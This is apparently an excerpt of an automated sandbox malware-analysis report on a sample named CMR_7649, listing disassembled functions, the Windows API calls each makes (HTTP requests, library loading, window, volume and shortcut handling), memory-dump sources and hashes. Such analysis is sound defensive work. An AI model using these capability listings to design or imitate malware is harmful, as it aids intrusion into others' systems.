                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: Http$ErrorInfoInternetLastOpenQueryRequestSend
                                                • String ID:
                                                • API String ID: 3705125965-3916222277
                                                • Opcode ID: 0ee13e9a60eb6ba6c748d714ed0ce9e8e081c7518857538375ec5b6ad63af0be
                                                • Instruction ID: d28fa13b4dde737238ce5dcfaacd3c540a76458eeabd88e5a6b3f8614e5f537b
                                                • Opcode Fuzzy Hash: 0ee13e9a60eb6ba6c748d714ed0ce9e8e081c7518857538375ec5b6ad63af0be
                                                • Instruction Fuzzy Hash: DB310B76A802047AE720EF56DC42FDFB7A8EBD9710F00851FFA0097281D6B5550987AC
                                                Function 0045FA41 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 120windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetMenuItemInfoW.USER32 ref: 0045FAC4
                                                • DeleteMenu.USER32(?,?,00000000), ref: 0045FB15
                                                • DeleteMenu.USER32(00000000,?,00000000), ref: 0045FB68
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: Menu$Delete$InfoItem
                                                • String ID: 0
                                                • API String ID: 135850232-4108050209
                                                • Opcode ID: 44596b6c283006d3404d95c3e5e16104138b05286e513df4f299336d423ce3c8
                                                • Instruction ID: 2caf7e1b7ae413ca61a5456c92b2eab9e90ede26a48057f627e29f4096114103
                                                • Opcode Fuzzy Hash: 44596b6c283006d3404d95c3e5e16104138b05286e513df4f299336d423ce3c8
                                                • Instruction Fuzzy Hash: CC41D2B1604201ABD710CF25CC45F17B7A9AF84315F148A2EFDA49B2C2D378E849CBA6
                                                Function 004507B7 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                                                Download Yara Rule
                                                APIs
                                                • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013), ref: 0045085F
                                                • GetWindowLongW.USER32(?,000000F0), ref: 0045087D
                                                • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0045088E
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: Window$Long
                                                • String ID: SysTreeView32
                                                • API String ID: 847901565-1698111956
                                                • Opcode ID: 6654344cdbbec2ecb5663208c63790126aca218b871aedcbee15bef271784643
                                                • Instruction ID: 2f6c96d6d770cdd7f6b01965cae739f5ffbb06f7b8c4bfc7c6bf121f6b9a1f40
                                                • Opcode Fuzzy Hash: 6654344cdbbec2ecb5663208c63790126aca218b871aedcbee15bef271784643
                                                • Instruction Fuzzy Hash: 34418D75500205ABEB10DF29DC84FEB33A8FB49325F20471AF865972D1D778E895CBA8
                                                Function 00434B02 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 108libraryloaderCOMMON
                                                Download Yara Rule
                                                APIs
                                                • LoadLibraryA.KERNEL32(?), ref: 00434B10
                                                • GetProcAddress.KERNEL32(?,AU3_GetPluginDetails), ref: 00434B88
                                                • FreeLibrary.KERNEL32(?), ref: 00434B9F
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: Library$AddressFreeLoadProc
                                                • String ID: AU3_GetPluginDetails
                                                • API String ID: 145871493-4132174516
                                                • Opcode ID: eeab42aefd2d36d06d7687f66def4b4fc74e6333f2f3c4216b61849e5f0d6007
                                                • Instruction ID: fc8523f5daf935d660d2a9c884068eb8da3e2fc1adb06f3317e0194b47a185ca
                                                • Opcode Fuzzy Hash: eeab42aefd2d36d06d7687f66def4b4fc74e6333f2f3c4216b61849e5f0d6007
                                                • Instruction Fuzzy Hash: C24107B9600605EFC710DF59D8C0E9AF7A5FF89304B1082AAEA1A8B311D735FD52CB95
                                                Function 00450D6B Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 102windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00450DFD
                                                • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00450E16
                                                • SendMessageW.USER32(?,00001002,00000000,?), ref: 00450E3E
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: MessageSend$Window
                                                • String ID: SysMonthCal32
                                                • API String ID: 2326795674-1439706946
                                                • Opcode ID: aa3fdffd2c37c9d1283d502314bb1f920e47acbbfa02c8d10baeab348a12d0cc
                                                • Instruction ID: 97bf4b40409f6c90460d1384a7672ac630dd7a2161d32aee0dcf483843136ede
                                                • Opcode Fuzzy Hash: aa3fdffd2c37c9d1283d502314bb1f920e47acbbfa02c8d10baeab348a12d0cc
                                                • Instruction Fuzzy Hash: A93195752002046BDB10DEA9DC85FEB73BDEB9C724F104619FA24A72C1D6B4FC558B64
                                                Function 004509D8 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 97COMMON
                                                Download Yara Rule
                                                APIs
                                                • DestroyWindow.USER32(00000000), ref: 00450A2F
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: DestroyWindow
                                                • String ID: msctls_updown32
                                                • API String ID: 3375834691-2298589950
                                                • Opcode ID: ede3ba3c4388c74c76a3cd747824982d62f6d25d37162a4df1ebcaa7ffb6df4e
                                                • Instruction ID: fccd3fcc05e4e2aaf5990a1cc96ccc3c6d01ef6560d5fec67e6c7c3c5f699695
                                                • Opcode Fuzzy Hash: ede3ba3c4388c74c76a3cd747824982d62f6d25d37162a4df1ebcaa7ffb6df4e
                                                • Instruction Fuzzy Hash: 213182767402056FE710DF58EC81FAB3368FF99710F10411AFA009B282C7B5AC96C7A8
                                                Function 0044DC13 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 95COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: _memmove
                                                • String ID: $<
                                                • API String ID: 4104443479-428540627
                                                • Opcode ID: 6c7976b20de454da7fe1266d8cf8ce191b2ccd068f9cf911d6d19d23786630cd
                                                • Instruction ID: e8c4ca86f7ae52158d8313b00b6d431508e51e3fea12eaab667d4a9530e7d8b8
                                                • Opcode Fuzzy Hash: 6c7976b20de454da7fe1266d8cf8ce191b2ccd068f9cf911d6d19d23786630cd
                                                • Instruction Fuzzy Hash: A331EF30D04258DEFF25CFAAC9847EEBBB1AF11310F18419AD455A7382D7789E48CB25
                                                Function 0045D779 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 80COMMON
                                                Download Yara Rule
                                                APIs
                                                • SetErrorMode.KERNEL32(00000001), ref: 0045D79D
                                                • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D812
                                                • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D85C
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: ErrorMode$DiskFreeSpace
                                                • String ID: \VH
                                                • API String ID: 1682464887-234962358
                                                • Opcode ID: e9044521b94c7a2fd6e775d53faddef87f956e6addecf71534c1072a2e4d61eb
                                                • Instruction ID: 72795a51c8fd7a71edb0939b11d44c3a5eb04741920228a3d2c34b8a4a3992bf
                                                • Opcode Fuzzy Hash: e9044521b94c7a2fd6e775d53faddef87f956e6addecf71534c1072a2e4d61eb
                                                • Instruction Fuzzy Hash: B5217171D002089FCB00EFA5D98499EBBB8FF48314F1184AAE805AB351D7349E05CB64
                                                Function 0045D78F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 77COMMON
                                                Download Yara Rule
                                                APIs
                                                • SetErrorMode.KERNEL32(00000001), ref: 0045D79D
                                                • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D812
                                                • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D85C
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: ErrorMode$DiskFreeSpace
                                                • String ID: \VH
                                                • API String ID: 1682464887-234962358
                                                • Opcode ID: 02922531bbe1fdf38ecd1c48401d7894eac39f8171a3426d51aa67f0eafe79b3
                                                • Instruction ID: ae55674c87016058c86dc8d4ad6f5a536cd264dc70ae423c542bf2f5a0a67e7a
                                                • Opcode Fuzzy Hash: 02922531bbe1fdf38ecd1c48401d7894eac39f8171a3426d51aa67f0eafe79b3
                                                • Instruction Fuzzy Hash: C9316F75E002089FCB00EFA5D985A9DBBB4FF48314F1080AAE904AB351CB75EE05CB94
                                                Function 0045D86D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 77COMMON
                                                Download Yara Rule
                                                APIs
                                                • SetErrorMode.KERNEL32(00000001), ref: 0045D87B
                                                • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D8F0
                                                • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D93A
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: ErrorMode$DiskFreeSpace
                                                • String ID: \VH
                                                • API String ID: 1682464887-234962358
                                                • Opcode ID: 657bf3a7bf4e4b0879eb54f11f0d4a47d1274a72e537d3786cc0042974389a76
                                                • Instruction ID: e5212c229d9c2069cdfe567d9572a18bb695f81ecf44ad0a977260396f8f3e20
                                                • Opcode Fuzzy Hash: 657bf3a7bf4e4b0879eb54f11f0d4a47d1274a72e537d3786cc0042974389a76
                                                • Instruction Fuzzy Hash: E6316D75E002089FCB00EFA5D984A9EBBB4FF48314F1084AAE904AB351CB35DE05CB94
                                                Function 0045D36D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 75COMMON
                                                Download Yara Rule
                                                APIs
                                                • SetErrorMode.KERNEL32(00000001), ref: 0045D37E
                                                • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D3F4
                                                • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D437
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: ErrorMode$InformationVolume
                                                • String ID: \VH
                                                • API String ID: 2507767853-234962358
                                                • Opcode ID: 3e53e890434f9ea80ffb8b8b8863db28d9ef5c2317443d22617d365319ccab8e
                                                • Instruction ID: 9072e4f9bd6fffdf4d5f5b526d3ef1379cf95bcdbb04681c41660468616ecd75
                                                • Opcode Fuzzy Hash: 3e53e890434f9ea80ffb8b8b8863db28d9ef5c2317443d22617d365319ccab8e
                                                • Instruction Fuzzy Hash: E5213075A002099FC714EF95CD85EAEB7B8FF88300F1084AAE905A73A1D774EA45CB54
                                                Function 0045D53E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 75COMMON
                                                Download Yara Rule
                                                APIs
                                                • SetErrorMode.KERNEL32(00000001), ref: 0045D55C
                                                • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D5D2
                                                • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D608
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: ErrorMode$InformationVolume
                                                • String ID: \VH
                                                • API String ID: 2507767853-234962358
                                                • Opcode ID: d1fa58eff2fbb7cc6c51b85e489fdb3630b63cb8eb333212ecdab13a3ad88969
                                                • Instruction ID: 5d1496e5fec29648c5677f840c6a5ff7f703137340fc9510fe584f3610dc7e3a
                                                • Opcode Fuzzy Hash: d1fa58eff2fbb7cc6c51b85e489fdb3630b63cb8eb333212ecdab13a3ad88969
                                                • Instruction Fuzzy Hash: 88218271A00209AFC714EF95C885EAEB7B4FF48300F0084AEF505A72A1D774E905CB58
                                                Function 00450ACC Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 74windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00450B3B
                                                • SendMessageW.USER32(00000000,00000406,00000000,00640000), ref: 00450B51
                                                • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00450B5F
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: MessageSend
                                                • String ID: msctls_trackbar32
                                                • API String ID: 3850602802-1010561917
                                                • Opcode ID: b7bd052b599063d2228b5cfe26d5df8f76e43bb35df486dd72efd91b953fbf0c
                                                • Instruction ID: cc80dcb7cd3031ad5716ab9229ca2671b5dcb2452333e47e40e099fef7a03d8b
                                                • Opcode Fuzzy Hash: b7bd052b599063d2228b5cfe26d5df8f76e43bb35df486dd72efd91b953fbf0c
                                                • Instruction Fuzzy Hash: 301196757403197BEB109EA8DC81FDB339CAB58B64F204216FA10A72C1D6B4FC5187A8
                                                Function 00435215 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 71COMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                • CLSIDFromString.OLE32(?,00000000), ref: 00435236
                                                • SafeArrayAccessData.OLEAUT32(?,?), ref: 00435285
                                                • SafeArrayUnaccessData.OLEAUT32(?), ref: 004352B4
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: ArrayDataSafe$AccessFromStringUnaccess_malloc
                                                • String ID: crts
                                                • API String ID: 943502515-3724388283
                                                • Opcode ID: 529e37b86e0cb06f9ed43835dc92f00344189a4a835cae890eb44c126e03fe94
                                                • Instruction ID: ec3ec3aa447b477297a9cb7ebc6a7fbeb91602aa87849f29064a6671b92f781e
                                                • Opcode Fuzzy Hash: 529e37b86e0cb06f9ed43835dc92f00344189a4a835cae890eb44c126e03fe94
                                                • Instruction Fuzzy Hash: EC213876600A009FC714CF8AE444D97FBE8EF98760714C46AEA49CB721D334E851CB94
                                                Function 0046E48C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64comCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 004426CD: _wcslen.LIBCMT ref: 004426F9
                                                • CoInitialize.OLE32(00000000), ref: 0046E505
                                                • CoCreateInstance.OLE32(00482A08,00000000,00000001,004828A8,?), ref: 0046E51E
                                                • CoUninitialize.OLE32 ref: 0046E53D
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                • String ID: .lnk
                                                • API String ID: 886957087-24824748
                                                • Opcode ID: ca4e97b0deac3c583c427a3e57c18447ee07ba297a7231e98f3a70961bae8bd6
                                                • Instruction ID: 8523b4f55483354ee3aaa8e7e2ee5f8b04597d59409be9d2747526508be4cfd1
                                                • Opcode Fuzzy Hash: ca4e97b0deac3c583c427a3e57c18447ee07ba297a7231e98f3a70961bae8bd6
                                                • Instruction Fuzzy Hash: E72183312082009FD700EF55C985F4AB7F4AF88729F14866EF9589B2E1D7B4E804CB56
                                                Function 0045D2C7 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58COMMON
                                                Download Yara Rule
                                                APIs
                                                • SetErrorMode.KERNEL32(00000001), ref: 0045D2D2
                                                • SetVolumeLabelW.KERNEL32(?,00000000), ref: 0045D331
                                                • SetErrorMode.KERNEL32(?), ref: 0045D35C
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
